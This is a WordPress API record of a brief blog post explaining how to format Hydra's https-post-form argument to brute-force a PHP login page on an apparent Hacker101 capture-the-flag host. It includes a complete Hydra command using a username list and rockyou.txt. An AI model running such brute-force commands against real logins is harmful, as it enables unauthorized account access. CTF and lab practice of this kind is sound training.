{"id":502,"date":"2023-05-02T18:11:28","date_gmt":"2023-05-02T18:11:28","guid":{"rendered":"https:\/\/www.aixperts.co.uk\/?p=502"},"modified":"2023-05-02T18:11:28","modified_gmt":"2023-05-02T18:11:28","slug":"using-hydra-when-first-parameter-is-a-php-script-to-load","status":"publish","type":"post","link":"https:\/\/www.aixperts.co.uk\/?p=502","title":{"rendered":"Using Hydra when first parameter is a PHP script to load"},"content":{"rendered":"\n<p>Hydra is a tool for brute-forcing web-page logins, but you probably already knew that, arriving at this post.<\/p>\n\n\n\n<p>I was trying to find the login for a URL that had \/index.php?page=sign_in.php at the end. Burp\/PHP code revealed is passed &#8220;username&#8221; and &#8220;login&#8221;, fairly standard. But the triple, colon-separated string you can optionally give Hydra as a last parameter, is not very well documented.<\/p>\n\n\n\n<p>In the end, this turned out to work:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># hydra -I -L usernames.txt -P rockyou.txt -S -e nsr bb699ce28112f9a55a0c4fbcc6b2ed8e.ctf.hacker101.com https-post-form \"\/index.php?page=sign_in.php:username=^USER^&amp;password=^PASS^:wrong\"<\/code><\/pre>\n\n\n\n<p>&#8220;wrong&#8221; being a return text we were looking for to identify a failed login.<\/p>\n\n\n\n<p>So, \/index.php?page=sign_in.php as the first string, and the second string is not prefixced &amp;, that is only used to separate the following parameters.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hydra is a tool for brute-forcing web-page logins, but you probably already knew that, arriving at this post. I was trying to find the login for a URL that had \/index.php?page=sign_in.php at the end. Burp\/PHP code revealed is passed &#8220;username&#8221; &hellip; <a href=\"https:\/\/www.aixperts.co.uk\/?p=502\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[165],"tags":[168,166,167,129,169],"class_list":["post-502","post","type-post","status-publish","format-standard","hentry","category-hacking","tag-brute-force","tag-hacking","tag-hydra","tag-login","tag-web"],"_links":{"self":[{"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/502","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=502"}],"version-history":[{"count":1,"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/502\/revisions"}],"predecessor-version":[{"id":503,"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=\/wp\/v2\/posts\/502\/revisions\/503"}],"wp:attachment":[{"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=502"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=502"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.aixperts.co.uk\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=502"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}